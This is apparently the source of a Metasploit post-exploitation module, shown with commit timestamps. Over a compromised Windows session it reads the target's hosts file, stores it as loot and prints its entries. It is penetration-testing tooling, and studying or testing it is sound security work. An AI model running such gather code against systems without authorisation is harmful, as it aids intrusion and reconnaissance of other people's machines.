2011-10-23 17:17:32 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-10-23 17:17:32 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Windows Gather Windows Host File Enumeration',
|
|
|
|
'Description' => %q{
|
|
|
|
This module returns a list of entries in the target system's hosts file.
|
|
|
|
},
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
|
|
|
))
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
# read in the hosts in the hosts file.
|
|
|
|
fd = session.fs.file.new("C:\\WINDOWS\\System32\\drivers\\etc\\hosts", "rb")
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Load up the original hosts file
|
|
|
|
buf = ''
|
|
|
|
until fd.eof?
|
|
|
|
buf << fd.read
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Finished loading the hosts file, close fd
|
|
|
|
fd.close
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Store the original hosts file
|
|
|
|
p = store_loot(
|
|
|
|
'hosts.confige',
|
|
|
|
'text/plain',
|
|
|
|
session,
|
|
|
|
buf,
|
|
|
|
'hosts_file.txt',
|
|
|
|
'Windows Hosts File'
|
|
|
|
)
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Split lines
|
|
|
|
lines = buf.split("\n")
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Print out each line that doesn't start w/ a comment
|
|
|
|
entries = []
|
|
|
|
lines.each do |line|
|
|
|
|
next if line =~ /^[\r|\n|#]/
|
|
|
|
entries << line
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Show results
|
|
|
|
if not entries.empty?
|
|
|
|
print_line("Found entries:")
|
|
|
|
entries.each do |e|
|
|
|
|
print_good(e.to_s)
|
|
|
|
end
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Hosts file saved: #{p.to_s}")
|
|
|
|
end
|
2011-10-23 17:17:32 +00:00
|
|
|
end
|